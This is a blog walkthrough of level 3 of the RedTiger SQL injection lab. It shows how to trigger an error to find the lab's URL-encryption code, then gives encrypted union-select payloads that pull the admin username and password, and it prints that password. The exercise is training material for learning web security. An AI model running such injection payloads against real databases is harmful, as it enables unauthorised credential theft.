SQL INJECTION(redtiger.lab)-Part2
Previously we have completed level 1 and 2 of redtiger lab.
Today we will be doing lab 3 .As the level goes up difficulty will also go up.
Level 3:
Here the task is to get the password of Admin and the hint given is try to get an error so we will try to get an error first.
For getting errors at first we click admin then a get request will be sent as shown below.
Here now to get an error lets change the parameter ?usr to ?usr[].
Once we change the parameter we will get an error as shown above. After reading the error we get to know that the error exists in file urlcrypt.inc so now lets go to
http://redtiger.labs.overthewire.org/urlcrypt.inc
Here a blank page will appear now right click on the page and then choose inspect element here we will see a php code double click on the code and then copy the code.
This is the code to encrypt and decrypt the url content.which means that we can’t just directly pass a query through the parameter.We have to encode our query using the encrypt function .
So let’s copy the encrypted code from the above location and paste in your local system or some online php compiler.
Here please use php version 5 as this code works on php version 5 as stated above.
Now the process of SQL injection is the same as in level 1 that we have learned in part 1, the only difference is that we have to encrypt the query using the above function.
Step 1: Determining No of columns
So at first let’s determine the no of columns for this we have to use hit and trail In this case as i have already solved it i know there are 7 columns so if you use more than 7 it will generate an error.
So the query will be : Admin’ order by 7 #
As discussed above we have to encrypt it know the encrypted query will be
MDQyMjExMDE0MTgyMTQwMTY5MjE2MDI0MjA1MTE1MTg1MTUzMDkxMjM5MDI5MDI4MjU1MDg2MTg5MDcz
Step 2: After determining no of columns let’s determine which columns can be used to display information in the website.
query: usr = ‘ union select 1,2,3,4,5,6,7 from level3_users where username=’Admin’ #
Now encrypting the above query :
usr=MDc2MTUxMDIyMTc3MTM5MjMwMTQ1MDI0MjA5MTAwMTc3MTUzMDc0MTg3MDk1MDg0MjQzMDgzMTc3MDg5MDMzMjIzMjQzMTk0MDcyMjM2MTMwMjAzMTY1MDQyMTk5MTU5MTA1MDU2MTg4MTMxMjEyMTcwMTE0MTE5MTQzMTM3MDUwMTU5MTkwMTc5MDY0MjIwMDc0MTU1MTAwMDg1MjAyMTMxMDkxMDQzMTYyMTg1MDQzMDU5MDcwMTk0MDk2MTAyMTI0MTIyMTAzMjEzMTkyMDEzMjIw
Once we pass the above query as parameter we get the following output.
Here we can see column 2,6,7,5,4 can be used to display information so we can use any two of the columns to display username and password.
Step 3 :Now to display username and password we use the below query.
usr =‘ union select 1,username,3,4,password,6,7 from level3_users where username=’Admin’ #
Here i have chosen column 2 and 5 , you can choose any columns that can display information(2,4,5,6,7).
Encrypting the query we get
usr = MDc2MTUxMDIyMTc3MTM5MjMwMTQ1MDI0MjA5MTAwMTc3MTUzMDc0MTg3MDk1MDg0MjQzMDgzMTc3MDMxMTI2MTQyMTczMTUzMDA1MTgzMjAzMjA4MTc3MDk2MTk3MTQ1MTE5MTA3MTY3MTM3MjA4MTcxMDUwMTE0MjUyMjAzMDk3MTU2MTkwMTc1MDEzMTM5MDc4MTU1MDk2MDg1MTM0MTk3MTE5MDU5MTYzMTc4MDU2MDM3MDAzMTM2MDQ3MDY2MTA2MTE0MDQ2MjA2MTQ4MDcyMTQxMjE0MDc1MDQ0MjE1MjAzMDM3MDgyMTk4MDcyMTIzMjE1MTE0MjIwMTQw
Now passing this encrypted query in usr parameter we get.
Here we found out the username is Admin and its password is thisisaverysecurepasswordEEE5rt
By this way we can perform SQL injection. It is the same type of SQL injection that we have done in level 1 with some modification.
I highly recommend you to perform all the steps by yourself don’t copy the codes if you want to learn . You can read this walk-through as reference.
References: